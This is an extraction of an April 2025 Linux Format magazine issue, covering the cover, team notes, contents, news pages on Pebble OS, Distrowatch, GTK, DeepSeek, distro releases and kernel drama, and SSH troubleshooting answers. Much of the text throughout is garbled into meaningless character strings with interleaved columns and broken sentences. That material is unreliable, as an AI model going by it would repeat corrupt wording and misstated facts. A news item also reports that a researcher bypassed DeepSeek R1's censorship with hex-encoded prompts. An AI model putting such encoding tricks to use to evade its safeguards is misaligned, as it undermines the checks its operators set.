FASTER PI 5!

WIRESHARK ANDROID VM
Tricks and hacks for The network hunter Run Android apps
a faster & cooler Pi is taking to the cloud! on your Linux distro

POWER DISTROS!
Take your Linux game
to the next level

The #1 open source mag

100
pages of L
in
tricks, tipsux
& more!

Pass our hacking challenge!

Discover tools and techniques
AI prompt injection hacks
Scan local Wi-Fi networks

PLUS: q¶ĭþ¶
Start coding with Rust
Run OnlyOffice on your NAS
Use Rust for secure remote desktops

AI HACK THREATS GO OLD SCHOOL •¶¥e࢕è¥eFĭz࢕bz

LXF April 2025

Defend your networks Try the systems that Have a LoRa fun with
from AI attack vectors made Linux great! low-cost networking
 WELCOME

Hacking an
MEET THE TEAM education
It’s that time of the year when
This month, we’re putting our readers 4"/"(,211%")1"01% ("/}0
through our Hacking Academy, so 1,,)(&1+!$"16,22-1,0-""!o
1%"/1%+ ,3"/)&$&+n
which old-school type of hack are you 4"}/"/,))&+$ (,5,21o +
most proud of? Tux’s Hacking Academyn4"$"1
6,22-+!/2++&+$n1("6,2
1%/,2$%1%" /&1& )1,,)0n01/1
6,2-)6&+$4&1%0,*""5-),&10n
Jonni Bidwell +!,21)&+"4%16,2+""!&+
In a feat worthy of Odysseus, I managed to !"!& 1"!% ("/}0&v &!-1,/
get a modern version of Apache running on x1%"6}/"+,1))2&)1".2))6o
a certain server that was running a very  +}11%&+(,#"11"/46
outdated OS. The fiendish process, which I 1,)"/+,21%,4&+25+!+"14,/(0#2+ 1&,+1%+% (&+$
wouldn’t wish on anyone, involved creating 464&1%("61,,)0+!!"!& 1"!!&01/,o 1}0,3&,20)6+,
a binary-compatible virtual machine and unspeakable horror. 02/-/&0"1%1,-"+0,2/ "+!&+25%3")460""+11%"
#,/"4%"+&1 ,*"01,1%"0"),4v)"3")+)60&01,,)0o%/,2$%
0"/"+!&-&16n1%&0&002"4"}/")0,1)(&+$1,1%"#,2+!"/0,#
Michael Reed ,+",#1%"("6+"14,/(1,,)0pWireshark. 10 /"1&,++!
I made use of the built-in exploit database !"3"),-*"+1&01"01*"+11,1%" ,**2+&1&"0+!"1%,0
on a pentesting distro. In minutes, I had ,#,-"+0,2/ "o")0, 1 %2-,+1%"&/)1"01-/,'" 1n
command-line access on an old Windows Stratoshark –&1}0#0 &+1&+$012##o
á-ࡳɢŔɭʋljɭȶȟŔȥˊʋǠǫȥnj࡬ǫʋɭŔȟɽǠȶȟơʋǠơ ,4"3"/n&#6,2'2014+11,$"1,+4&1%20&+$&+25n6,2
fact that you should never connect an old 0%,2)!1/6,+",#1%"-,4"/!&01/,04"}/"1"01&+$1%&0&002"o
machine to the internet. Security updates, people! # ,2/0"n/ %&+254&+0%+!0!,4+n211%" ,*-&)"!v
#/,*v0,2/ " "+1,,,/ ,+#&$2/1&,+v0"!&5)0,,##"/
&++,31&3"n-,4"/#2)+!*&+!v"5-+!&+$460,#)"/+&+$*,/"
Tam Hanna ,21%,4&+254,/(0+!n,# ,2/0"n%,44" +))"+',6&1j
òȶȟơˊơŔɭɽŔnjȶ࡬ȶˁȥơɭɽȶljáŔȍȟ¶òá7ɽ
not made by Sony did not have access to
NetFront, the cream of the web browser
ƃɭȶɢࡳbȶɭʋʠȥŔʋơȍˊ࡬ŔȍǫʋʋȍơơȟʠȍŔʋȶɭáè-
ljǫˉơƎʋǠơɢɭȶŹȍơȟ࢘ǫʋƃǠŔȥnjơƎʋǠơáŔȍȟ
OS registry to pretend to be a Sony device, and all was well. Neil Mohr Editor
[email protected]

Les Pounder
I recently got my hands on an Issue 2
ŁĴࢳòɢơƃʋɭʠȟˁǫʋǠࠀࠅ‘ȶljè¡ࡳþǠơɢȶˁơɭ
supply was a little dodgy, so I managed

SAVE! * Subsc
ʋȶࢳŹʠǫȍƎŔčò%-ɢȶˁơɭɽʠɢɢȍˊʠɽǫȥnjŔ
ȟŔȥʠŔȍȍˊɽơȍơƃʋŔŹȍơčò%-á7ɢȶˁơɭ
ŹȶŔɭƎࢳŔȍȶȥnjˁǫʋǠŔ7-ŹŔɭɭơȍǿŔƃȇࡳ

50
Nick Peers
% & savribe e!
òȶȟơʋǫȟơɽ࡬ˊȶʠǠŔʽơʋȶŔʽȶǫƎečzɽŔȥƎnjȶ
straight to the underlying settings – or JSON On digita
l and p
file in the case of HandBrake, where I’ve
see page rint:
mastered the art of copying and pasting 16
audio track names across a queue of titles
using a text editor. Far quicker than manually typing them.

*Savings are based on the cover price.

www.techradar.com/pro/linux April 2025 LXF326 3

 SUBSCRIBE NOW!
Page 16

REVIEWS

Asus ZenWiFi BT8 19

Brandon Hill finally thinks this is a worthy
Wi-Fi 7 router, and while it’s still expensive, Erstwhile academic Jonni Bidwell
at least it justifies the cost.
transmuted his ivory tower book
Pop!_OS 24.04 Alpha 5 20 smarts into l33t hacker knowledge.
Nate Drake picks apart System76’s pet And he’s here to pass it on.
distro, based on Ubuntu. Does Pop!_OS hit
See page 32!
with a bang or a whimper?

Siduction 2024.1.0 21
Nate Drake has been hobnobbing with
Siduction’s developers to inform you about
all this Debian-based distro has to offer.

CREDIT: Magictrorch
MakuluLinux 2025.1 22
Nate Drake heads to Vietnam to explore
this feature-rich distro with its own Electra
AI assistant. What more could you want?

Ditana 0.9.0 23
ROUNDUP IN DEPTH
Nate Drake delves into the beta version of
this Arch-based distribution. Is it ready to
roll or just played out?
CREDIT: Westend61/Getty Images

Power-user distributions 26 Wireshark to the cloud! 52

Halls of Torment 24 Michael Reed tries his hand at some Linux Linux Format talks to Gerald Combs and
Management loves the idea of a vast distros thatthrow ease of installation out Loris Degioanni, about creating Wireshark,
armyhammering away at keys all day – of the window in favour of customisation the origins of network packet analysis, and
Joshua Wolens thinks that’s his day job. and a learning experience. how they want their shark to fly...

4 LXF326 April 2025 www.linuxformat.com

 CONTENTS

Pi USER TUTORIALS

Pi news 43 TERMINAL: Back up data with ease 56

Introduced by Les Pounder, who is Neither music nor love will solve your
wondering whether the 16GB Raspberry computing problems but timely backups
&=&04,/1%&10-/"*&2*-/& "o just might, feels Shashank Sharma.

MX Linux 23.5 44 WAYDROID: Android apps on your PC 60

Les Pounder takes his annual spin with Nick Peers discovers a fast and relatively
MXLinux on the Raspberry Pi 5. Has it Get the most from your Pi 5 46 easy way to run Android apps on your
improved since 2024? Spoiler: yes! Faster CPU, storage and RAM for your Linux installation.
Raspberry Pi 5 has Les Pounder shouting
with a raspberry yell: “More! More! More!” RUSTDESK: Self-host remote access 66
Remote-control software is useful, but
Tam Hanna says open source self-hosted
remote control software is even better.

OrangePi 4A 45 Long-range wireless without bills 48

The ingredients are all there, but this Exchanging data over long ranges without
Pi just doesn’t taste sweet enough paying a fortune sounds like a dream, but
for Les Pounder. Tam Hanna and LoRa let you do it!

CODING ACADEMY

Code Space Invaders in BBC Basic 90 HARDWARE: What made Linux great 70
Nate Drake invites you to stave off the To kick off our new series, Mike Bedford
alien menace by coding your very own delves into the largely forgotten 80386,
Space Invaders clone in Basic. where Linux first saw the light of day.

How fast can your Rust code run? 94 ONLYOFFICE: Run it from your NAS 74
David Bolton demonstrates two Rust Enhance your private Synology cloud with
programs to time card shuffling and OnlyOffice Docs, asKseniya Fedoruk walks
generate a file full of poker cards. you through the installation process.

REGULARS AT A GLANCE ADMINISTERIA

CREDIT: Magictrorch, Compaq Deskpro 386 16Mhz/Wikimedia Commons

News 6 Subscriptions 16 Administeria 76

Pebble rocks up again; Distrowatch Grab your monthly dose of Linux and save a Laziness is the mother of invention and
temporarily unwatched; DeepSeek massive 50% off the usual price! Stuart Burns is a past master at getting
censorship dodged; Gnome harnesses hismachines to do work for him…
HDR; Flathub ups gaming offer; plus Back issues 64
industry insider opinions and more. Get hold of previous Linux Format editions.

Kernel watch 10 Overseas subscriptions 65

Get Linux Format shipped around the globe.
Answers 11
Neil Bothwick starts his day with a big HotPicks 83
2-,# ,*-21"/ ,+2+!/2*0o%&0*,+1%n Mayank Sharma is thinking of reigniting
%"1 ()"01"0"/002 %006+ %/,+&0&+$ the Vim versus Emacs debate in the hope
folders, keeping copied files in alphabetical of generating heat to warm him enough
order, and random read-only disk errors. 1,!&0 ,3"/--002 %0SysD Manager,
AdGuard Home, ExifTool, Tuptime, AI security threats 78
Mailserver 14 Xournal++, Double Commander and more. The rise of AI presents cybersecurity
Readers regale Neil Mohr with a slew of challenges for all. Davey Winder explores
suggestions and queries. Next month 98 the dangers – and how to put up a defence.

www.techradar.com/pro/linux April 2025 LXF326 5

 THIS ISSUE: Pebble OS rocks up again Distrowatch unwatched
DeepSeek censorship dodged Flathub ups gaming offer

OPERATING SYSTEM

Pebble OS returns from

the dead as open source
Pebble OS lives! Google open sources code as original founder plans
successor smartwatch with long battery life and always-on display.
n June 2018, support officially ended the software that ran on Pebble smart watches
I for Pebble smartwatches. After being
launched on Kickstarter in 2012, the
before the company shut down.
It’s built on the FreeRTOS operating system
Pebble quickly gained traction due to its long for microcontrollers. It includes modules for
battery life, always-on display and a reasonably memory management, graphics and
developer-friendly ecosystem that supported timekeeping. It also has a framework for running
creating multiple watch faces. Successive custom applications in C and JavaScript through
generations of watches like the Pebble Time the JerryScript engine.
also launched thanks to backing on Kickstarter. Some proprietary components have been
Sadly, Pebble failed to compete with existing removed for licensing reasons. These include
rivals and struggled to make a consistent profit. the system fonts, voice codec and Bluetooth There were many apps for Pebble
The company shut down in 2016 and Fitbit stack. This means the code can’t currently be devices, including ones that could
acquired most of its assets and employees. compiled as-is, so is being provided for send notifications, such as when
The coding community immediately sprang information purposes only. users received an email.
into action and begun work on so-called Rebble Nevertheless, Migicovsky is Credit: Pebble Technology
web services and an app store, to restore much working with a small team on a
of the Pebble devices’ functionality in the successor to the Pebble that
absence of an officially maintained OS. will run using the open source
Pebble’s founder Eric Migicovsky has now code. Ostensibly the watch will
also announced plans to resurrect Pebble via have the same specs and
use of newly released open source code. features as a Pebble device,
Speaking on his personal blog, Migicovsky though Migicovsky has also
explained that the proprietary Pebble OS promised “some fun new stuff
originally took company engineers to build. 04"))€o "%0/2)"!,21
CREDIT:&(&*"!&n &1 2nLWN.net

0 ,,$)"%00&+ "1("+,3"/ &1&1n%" raising money through

decided to ask it to release the OS as an investors in order to maintain a All proprietary components have
,-"+0,2/ "-/,'" 1o more sustainable business model. Shipping been removed from the current
The tech giant agreed and with the help of dates and availability have yet to be confirmed version of Pebble OS on GitHub, so
0,*""5v")"v12/+"!v ,,$)""*-),6""0n0 and there’s currently no official waiting list. it can’t be compiled as-is.
well as Rebble developers, the source code for Migicovsky’s team has also been supporting
")"&0+,43&))",+ &1 2ƒhttps:// development of Cobble, an open source Pebble-
github.com/google/Pebble). compatible watch companion app. It is already
The latest version of the Pebble OS available for Android devices and Migicovsky
repository contains the latest internal version of has promised that iOS support is coming soon.

6 LXF326 April 2025 www.linuxformat.com

 NEWSDESK

SOCIAL MEDIA OPINION

Distrowatch blocked, then 20 YEARS

allowed by Facebook OF ODF
Facebook’s Linux ban sparks outrage.

n late January, editor Jesse Smith

I reported in the Distrowatch weekly
newsletter that Facebook’s internal Italo Vignoli
-,)& 6*("/%! )00&#&"!&+25+!00, &1"! is one of the founders
sites and groups as cybersecurity threats. of LibreOffice and the
Facebook users immediately started having Document Foundation.
difficulty posting links to Distrowatch. In some
cases, Smith claimed that people’s accounts had In 2025, the Open
been locked or limited – including his own. Document Format
Although he tried to appeal the ban, ƒ „ ")"/1"0&10:81%
 ",,(/"-,/1"!1%1&+25v/")1"!*1"/&) anniversary as an OASIS
would remain on its cybersecurity filter. Out ƒ/$+&71&,+#,/1%"
,#,-1&,+0n*&1%/" ,**"+!"!1%1&+25 Advancement of Structured
enthusiasts look for alternative sources about Information Standards)
1%")1"01/")"0",#&+25n02 %0620&+$ Here we are encountering posting problems! standard. ODF was
Distrowatch’s RSS feeds or Mastodon channel developed with the aim
ƒhttps://mastodon.social/@distrowatch). -,01,+&+25""()6"401%11%"21,*1"! ,#-/,3&!&+$3"+!,/v
Meta’s stance is especially strange, given it blocking of Distrowatch was “for hosting a link +"21/)n,-"+01+!/!#,/
uses a modified version of CentOS Stream on to a file detected by third-party security vendors documents, spreadsheets
Facebook servers. In fact, Meta’s Davide Cavalca 0*)4/"€o%"6)0, ,+#&/*"!1%1&+25v and presentations.
holds first place on the membership list of related discussions are permitted on the site. ODF is supported by all
6-"/0 )" x1%""+1-" &) +1"/"01 Linux Format contacted Meta for comment *',/,##& "02&1"00"!
/,2-#,/)/$"v0 )"20"/0o without reply. At the time of writing, we could ,+&/"##& "" %+,),$6x
%" ()0%#/,*&+2520"/0-/,*-1"! create posts and comments on Facebook with LibreOffice, Collabora Office,
someone claiming to be a Meta employee to links to Distrowatch and www.linuxformat.com. NextCloud Office and Zeta
Office – and several pieces
of proprietary software, such
as Microsoft Office.
TOOLKIT ,3"/+*"+10+!
institutions worldwide have
embraced ODF for public

GTK winter 2025 update administration, ensuring

long-term document
accessibility and reducing
Upcoming changes include X11 deprecation. reliance on proprietary
0,#14/"o ,4"3"/n1,,*+6
he GTK development team has The GTK-/,'" 1%0)0,&*-)"*"+1"!0,*" governments still ignore the
T 2+3"&)"!0,*"*',/2-!1"0!2/&+$
1%"/" "+1 :8:=  (#"01
cut-offs for older platforms: the minimum
supported versions will be Windows 10 and
fact that a proprietary format
represents a significant cost
in Brussels. The programmers have been  98o9=ƒ1)&+„o-,01,+GTK’s official for the community as it
working towards both the upcoming v4.18, as Mastodon channel explained that this will keeps user-generated
well as laying some groundwork for GTK 5. streamline development, given that coders will content hostage to the
One of the most controversial changes is +,),+$"/%3"1,!")4&1%*7",#&#!"#0+! proprietary software vendor.
the deprecation of the X11 and Broadway unavailable APIs”. The 20th anniversary is a
back-ends. At one stage, Broadway offered a GTK 4.18 will also introduce the AccessKit reminder of the importance
useful way for GTK apps to output to modern back-end, bringing its accessibility features to of open standards in
=4&1%&+4"/,40"/0o ,4"3"/n&140 Windows and Mac OS. The at-spi default back- fostering innovation, digital
never widely adopted. "+!&+&+254&)))0,"2-$/!"!o sovereignty and user
Despite this, both back-ends will be The GTK team has also announced the freedom. We will celebrate
supported until the end of life for GTK 4. In development of an Android back-end. Currently the anniversary on
/"0-,+0"1,,+)&+" ,*-)&+10n1%" 1"* 1%&0%0+, /"+!"/"/02--,/121#,/1%,0" :>1%/ %n!2/&+$
pointed out that this won’t happen until the who want a sneak peek, gtk4-demo can now be , 2*"+1 /""!,*
release of GTK 6 – around 20 years from now. run on Android devices. Day. Stay tuned.

www.techradar.com/pro/linux April 2025 LXF326 7

NEWSDESK

OPINION ARTIFICIAL INTELLIGENCE

DATA AI censorship
POINTS broken with hex We were also able to use hex
Chinese AI firm DeepSeek’s censorship prompts to discuss censored
subjects like the Falun Gong
has been bypassed by a researcher. with DeepSeek’s LLM.

hina-based DeepSeek upended the AI

C
)&(")640+}1)&+("!!&/" 1)61,1%"&10")#21
Lori Lorusso sector in late January, ostensibly by to an additional higher layer of sanitisation.
is head of community, Percona. -/,3&!&+$#2+ 1&,+)1%140 If so, it’s often possible to manipulate the
developed for a fraction of the cost of other input and output of text being processed by
I have recently been *',/-)6"/0)&("ChatGPT. )+$2$")"/+&+$*,!")0o  ("/0%3"""+
to two of Europe’s DeepSeek’s R1 model is also controversial )"1,|'&)/"(}ChatGPT in the past in this
most popular open source due to its restrictions regarding sensitive topics way by using non-English prompts.

CREDIT: DeepSeek
community events: FOSDEM in China, like the 1989 protests in Tiananmen In the case of the DeepThink-R1 model, the
in Belgium and State of Open Square. An anonymous security researcher has researcher discovered that using base 16
,+&+1%"o,n4%1/" now been able to bypass this with carefully %"5!" &*) %/ ,!"01, %14&1%1%"
my biggest takeaways? /#1"!-/,*-1&+'" 1&,+0o%" ++6 6-00"!1%"#&)1"/"+1&/")6o "20"!1%&01,
On the community side, researcher worked out that this censorship discuss otherwise censored topics.
there is no shortage of
passionate people. Everyone
who makes it to these events
has an interest in technology,
%")-&+$1%"&/-/,'" 10$/,4n
DESKTOP ENVIRONMENT SOFTWARE
and collaborating with more
people to solve problems.
The depth of feeling is
)460*7&+$+!&+0-&/&+$o
Gnome Flathub adds
On the other side,
companies involved in open
source have to build and
adds HDR new sections
sustain their operations,
+!1%1*"+0 /"1&+$
profitable business models.
configuration New We Games and On
The Go categories make
A big challenge to this is HDR support answers for easier Flatpak browsing.
telemetry. While we are keen
long-standing requests. lathub users already know that the
F
1,0%/",2/-/,'" 10#,/
reuse, we don’t have enough 0&1"+"1)6 1"$,/&0"03&))"--0
data on where they are used into groups such as Networking and
G
+,*"<@}0#"12/"#/""7"1,,(-) "
or where we might want to &+ "/2/6o 201"#,/"1%"!"!)&+"n Education. This has now been supplemented
concentrate in future. code was introduced to better support with a We  *"0 1"$,/6n4%& %&0#2/1%"/
This is changing. Analytics ƒ%&$%!6+*& /+$"„o%"&*-)"*"+11&,+ subdivided into games, game launchers,
company Scarf tracked more &+ )2!"0&+1/,!2 &+$|,+#&$2/" 3& emulators and game tools. There’s also now an
than 10 billion open source ApplyMonitors’ for Mutter, +,*"}04&+!,4 +%" , 1"$,/61,$/,2-1,$"1%"/&+25
downloads in 2024. At manager. It replaces the previous experimental apps for mobile devices.
Percona, we use telemetry -/,-"/16#,/ o0"/04&))")"1,!&/" 1)6 So-called Flathub Fixer Bart Piotrowski
data to understand how "+)" 02--,/14&1%o:988 ,),2/0- " %0)0,-,01"!,+1%"0&1"),$n++,2+ &+$
users interact with our open mode via a new option in the Gnome Control changes to the store’s infrastructure. This will
source products, helping us Center. This news has gone over well with the mainly focus on improving compatibility with its
better serve the community. &+25 ,**2+&16n4%& %%0""+/".2"01&+$ continuous integration system Buildbot, as well
We hope other open source better display capabilities for years. as work on its successor.
-/,'" 10!,-11%&0--/, %o
Under the Flathub
CREDIT: +,*"n )1%2

We have to make this data

hood, HDR now has a
3&))"1,%")--/,'" 10+! dedicated
is currently
companies succeed, while category for
referred to as
respecting the community’s colour mode. games, as
wishes. A tough balancing well as On
act, but one we have The Go for
to take on. mobile apps.

8 LXF326 April 2025 www.linuxformat.com

 NEWSDESK

Distro watch
OPINION

MAKING
What’s behind the free software sofa? TRACKS
GPARTED LIVE 1.7.0-1
%&0)&3"!&01/,&0+}1&+1"+!"!0!&)6!/&3"/o ,4"3"/n&1!,"0-/,3&!"
0& $/-%& )"+3&/,+*"+1ƒ ,2/1"06,#o,/$+!Fluxbox). From
here, users can launch a number of tools for analysing and partitioning
hard disks. New versions are made available roughly once a year. The
)1"01/")"0",# /1"!+,4&+ )2!"002--,/1#,//" ,$+&0&+$0 GParted is designed Frederic Plourde
ƒ+"14,/(), (!"3& "0„o 1%0)0,&+1/,!2 "!"5-"/&*"+1)02--,/1 to partition hard disks ǫɽĴèȍơŔƎŔʋࢳ-ȶȍȍŔŹȶɭŔࡳ
for Bcachefs single device filesystems. See https://gparted.org. and fix drive errors.
If you’re not familiar
with VR terminology,
lighthouse tracking is a
SOLUS 4.7 positional tracking system
Solus is an independent rolling release distro that’s focused on for VR headsets and
!"0(1,- ,*-21&+$o 120"0#,/("!3"/0&,+,#1%"PiSi package controllers. It tracks the
manager called eopkg. The flagship edition uses Budgie but other movement and position of
!"0(1,-"+3&/,+*"+10/"3&))"n&+ )2!&+$ +,*"+!)0*o devices in 3D space with
%")1"013"/0&,+ƒ ,!"+*"+!2/+ "„+,4,##"/0+"40,#14/" high precision.
"+1/"04&1%2+!)"!02--,/1#,/ )1-(0o%"&+25("/+")%0""+ Solus now offers There exists an open
upgraded to v6.12.19. The OS also now has better support for Nvidia ķĬÐĨĬǏ­ǎÆéČìÆÐǎČãǎ source, community-driven
graphics cards. Discover more at: https://getsol.us. ĬČãijŋ­ĨÐǎÆÐĆijĨÐĬƧ implementation of
lighthouse tracking called
Libsurvive. %&0-/,'" 1
contains free tools and
KAOS 2025.01 libraries that enable tracking
&0&+0-&/"!6/ %&+2521&10 /"1,/0!"3"),-1%"&/,4+ on lighthouse and Vive-
packages, available from in-house repos. It uses KDE Plasma and based systems, and can run
bundles popular apps like the Calligra office suite. New packages in this on any device. It currently
version include the Firefox-based Zen browser and Harper, an open supports both SteamVR 1.0
source grammar and spelling checker. Behind the scenes, the KaOS N­]}ǎĆČŋǎìĆÆÿķÌÐĬǎ and SteamVR 2.0 devices,
4"0&1"%0)0,%!*',/,3"/%2)o%"-/,'" 1}0 ,!"%0)0, the Zen browser and and is also easily usable with
*&$/1"!#/,* &1 21,,!""/$o"!*,/"1https://kaosx.us. ­ǏĬĥÐÿÿÆéÐÆüÐĨƧ Monado, the cross-platform,
open source XR runtime.
Recently, I had the
pleasure of announcing an
PARROT OS 6.3 exciting new chapter for this
Formerly known as Parrot Security OS, this Debian-based distro open source tracking system
&0!"0&$+"!#,/-"+"1/1&,+1"01&+$o&("&10"11"/v(+,4+ ,20&+ 01%"-/,'" 11/+0&1&,+"!
)&n&1 ,*"04&1%%2$" ,))" 1&,+,#21&)&1&"0#,/% (&+$n/"3"/0" &10,4+"/0%&-1,,)),/}0
engineering and cracking passwords. It uses the MATE desktop &1 2,/$+&01&,+n4%"/"
environment. The latest release comes with upgrades to key packages two people in our XR team
like Wireshark and Burpsuite. The system libraries have undergone a v­ĨĨČijǎÆČĆij­ìĆĬǎ 4&))",##& &)*&+1&+"/0o
*',/2-!1"o%"/"}0)0,#&5#,/2$1%1-/"3"+1"!VirtualBox numerous tools for The previous maintainers,
&*$"0#2+ 1&,+&+$-/,-"/)6o"/+*,/"1https://parrotsec.org. penetration testing. due to other commitments,
decided to pass the torch to
"+02/"1%"-/,'" 1 ,+1&+2"0o
We are grateful for their
PORTEUX 1.9 contributions and look
Based on Slackware and inspired by Slax and Porteus its main goal is to forward to supporting the
be super fast, small, portable, modular and immutable. It’s set for basic -/,'" 10*2 %04" +o
usage, including lightweight applications for the seven standard Bringing Libsurvive into
desktops. No browser is included, but an app store provides easy the fold is exciting, further
0,#14/"!,4+),!0o%"-/,'" 1}0)1"010+-0%,1&0,/1"29oA4%& % Inspired by Porteus pushing 6DoF tracking for
#&5"0+2*"/,#&002"0n!!002--,/101, ;n+!2-!1"0 ijéìĬǎìĬǎ­ǎ}ÿ­Æüŋ­ĨÐǎ ))!"3& "0&+1/2"n,-"+
the kernel to version 6.13.1. Read more at https://github.com/porteux. based distro. source fashion. Catch us on
the Libsurvive Discord
to stay in the loop.

www.techradar.com/pro/linux April 2025 LXF326 9

NEWSDESK

Kernel Watch
OPINION

BURNT
OFFERINGS
Jon Masters summarises the latest happenings in
the Linux kernel, so that you don’t have to.
inus Torvalds announced the first
L
&)& ,+ 0n-",-)"1,,(%&*0"/&,20)6o%"
couple of Release Candidates for Asahi project (and its remix of Fedora) is relied
what will become Linux 6.14. upon by Linus himself, who often uses a Mac.
Jon Masters is a kernel hacker Among the new features are the usual "3"/)!/&3"/01%1#,/*1%"0%&-,/1
who’s been involved with Linux internal refactoring and device driver (including graphics support) are written in Rust,
for over 22 years, and works on updates, but also completed support for the a modern memory safe language. The Rust for
energy-efficient Arm servers. ntsync Windows compatibility feature that Linux (r4l) project is focused on enabling Rust
will benefit gamers. A number of changes 1, ,v"5&014&1%1/!&1&,+) ,!"&+1%"("/+")
There’s been a lot of were merged to further development of source through special interfacing wrappers
talk about maintainer drivers in Rust, including PCIe support. 1%1 ,+3"/11%"v0"! &+1,,+"1%1201
burnout. Many projects have Perhaps the biggest piece of news is how drivers can use. The latest drama began when
a single maintainer who ‘tiny’ the 6.14 release will be when compared one of the Rust developers posted a patch
works in a hobbyish to recent kernels – it will have ‘only’ half a against the kernel’s DMA subsystem. DMA
capacity. Over time, their million lines changed and 10,000 individual (direct memory access) is used to accelerate
project becomes popular commits (collections of patches). For almost copying data to/from devices. Maintainer
and derives paying any other project, that would be
customers. The developer massive, but for Linux, that’s “The thread became heated, but touched on
starts experiencing the down 30% on a normal
demands of large numbers development cycle. Linus
issues of burnout, the fact that most developers
of users who expect more attributed it in large part to ­ĨÐǎĥ­ìÌǏÅőǎÆČĨĥČĨ­ijìČĆĬƨǎ­ĆÌǎŋé­ijǎìijǎij­üÐĬǎijČǎäÐijǎ
than the developer can 1%"1&*&+$4&1%"+!v,#v6"/ ÆČÌÐǏìĆijČǎPìĆķŐǎijéÐĬÐǎÌ­őĬƧDž
,##"/&+1"/*0,#1%"&/1&*"o holidays, noting, “I really feel
The demands come to a like this year we got the whole holiday Christoph Hellwig replied: “No Rust code in
head and the developer has season release timing right.” In other words, kernel/DMA, please.”
to look out for their own some folks actually got to spend time with This lead to a lengthy back and forth.
wellbeing, day job, family, their family over the recent holidays. Eventually, Marcan suggested: “Rust folks
whatever else is going on. should just merge this series… ignoring
The Linux kernel has Rust upheaval Christoph’s overt attempt at sabotaging the
plenty of subsystem By far the most significant discussion topic project.” Apparently, Marcan posted a rant on
maintainers effectively over the past month has been the state of Mastodon, sufficient for a new followup thread
going it alone, and has the Rust for Linux project, and the fate of its titled ‘On community influencing’ in which
experienced its fair share most prominent user, Asahi Linux. Asahi was various kernel developers pushed back on
,#2/+,2101,/&"0o,n&1 founded by Hector Martin (aka Marcan) as “social media brigading”. The thread became
&04&1%1%&0&+*&+!1%1  +"##,/11,/"3"/0""+$&+""/--)"&)& ,+ heated, but touched on issues of burnout, that
-,+!"/1%&0*,+1%}0201v Macs and to port Linux to them. Marcan was most developers are paid by corporations, and
related drama. As you’ll 4"))(+,4+#,//"3"/0""+$&+""/&+$,+6}0 what it takes to get code into Linux these days.
learn (see main story), the )611&,+ ,+0,)"1,/2+&+25n1%20n4%"+ Ultimately, Marcan decided to leave the kernel
lead developer of Asahi he suggested he would port Linux to Apple community and step down from Asahi.
Linux has stepped away
after feeling burned out.
While the story has a lot ONGOING DEVELOPMENT
of nuance, I feel sympathy
for Marcan and those Updated Kexec HandOver (KHO) patches enable support for a feature of the
involved. I’m not a Rust fan, were posted that allow the kernel to kexec Clangƒ„ ,*-&)"/&+4%& %&1
but they’re striving to make (load another kernel) while keeping various 4/+0,211%/"!0#"16&002"0o 1
something they believe in states around. In particular, this is useful apparently relies upon a C language
happen. Dealing with the #,/0&121&,+04%"/",+"*&$%14+11, extension called capabilities that allow
upstream community can patch and effectively reboot a hypervisor ,!"1,"++,11"!+!1%"+ %" ("!1,
be brutal. I used to maintain while not disturbing any existing guest see if it is operating within the intended
a small package used by the virtual machines. constraints, the goal being to improve
kernel and grew tired of 1%/"!1&1)"!|,*-&)"/v0"! detection of potential threading issues
dealing with some of -&)&16v+!, (&+$v+)60&0}&*01, 1%1 ,2)!)"!1,!"!), (0o
1%"-"/0,+)&1&"0
&+3,)3"!o,n $"1&1o

10 LXF326 April 2025 www.linuxformat.com

 Neil
Bothwick
starts his day
Got a burning question about open source or the kernel? with a big cup
of computer
Whatever your level, email it to [email protected] conundrums.

Q That not syncing feeling

%3"""+20&+$grsync,3"/
can use ssh-keygen to create a suitable
key pair acceptable to both. If both sides
,/!"/o +*"!1%";01,#,)),41%"
-)6,/!"/ 4+1o ,/"5*-)"poY/01
 #,/6"/01, (2-0,*"#,)!"/0 say they do accept RSA, it may be that 0,+$no0" ,+!0,+$n+!0,,+o
-004,/!v)"00#/,**6*&+ ,*-21"/ your keys are not large enough (smaller %" ,))" 1&,+)0, ,+1&+00,*"
1,"1$"/"!602,:4&1%,21 is less secure). You can see the minimum 02!&/" 1,/&"04&1%*,/";0&+1%"*o 
&002"o" "+1)6n !" &!"!1,!, )"+ accepted size with: 4,2)!)&("1,&+ )2!"1%,0"02!&/" 1,/&"0
&+01)),#&+25&+1#1"/6"/0,#/,))&+$ $ ssh -G user@nas | grep requiredrsasize 04"))o+!!&1&,+) ,*-)& 1&,+&0
2-!1"0o%"+ /"v&+01))"!grsync+! You can also check the ciphers in use at 1%11%"Y)"+*"0 ,+1&+0- "0+!
/"1"!("60+!1/&"!1, ,-61%"* each end with: 0,*",#1%"* ,+1&+-/"+1%"0"0+!
1,1%"n 01/1"!1,$"1 ,++" 1&,+ $ ssh -Q cipher 1%", 0&,+)0&+$)".2,1"o%"+ 20"
-/,)"*0n4&1%"//,/0)&("p However, the best option is to use a Krusader1, ,-61%"Y)"0n+! 0")" 1
Unable to negotiate with 192.168.1.106 port more recent algorithm, such as ed255219, )),#1%"Y)"0+! ,-61%"*&+0&+$)"
22: no matching host key type found. to create your keys: ,-"/1&,+n1%")-%"1& ),/!"/&0+,1
Their offer: ssh-rsa $ ssh-keygen -t ed25519 ("-1o%"6"+!2-&+1%",/!"/&+4%& %
rsync: connection unexpectedly closed If your NAS only supports a type of 1%"6--"/4%"+ 20"1%" ,**+!p
+6,2-)"0"$&3"*"0,*"!3& " key not enabled by default, the last resort $ ls -f1
,+1%" ,//" 1461,0"1&12-l is to enable the use of the key algorithm %3"1, ,-6"3"/6Y)",+"11&*"n
Ronald Zec in either š"1 š00%š00%u ,+Y$ or ~/.ssh/ 4%& %1("0#,/"3"/+!&0-&+o
,+Y$o%"#,/*"/Y)"0"10$),),-1&,+0n 1/&"!1%"cp ,**+!n21&1!,"0+,1
A It looks like reason the connection
is failing is that later versions of
the latter is for that user only. Add this
1,1%"Y)"n,/ /"1"&1&#&1!,"0+}1"5&01p
--"/1,%3"+602--,/1#,/0,/1&+$
1%"Y)"0n+! $"11%""5 10*"/"02)1o
OpenSSH no longer support RSA keys by Host nas.your.network 192.168.1.106 1/&"!))0,/10,#1%&+$0n21 /"))6!,+}1
default, so if they are disabled on either HostKeyAlgorithm +rsa (+,44%1 }*!,&+$o
your computer or the NAS, you will see You do not need both domain name cp <(ls -bR1 albums) usbstick
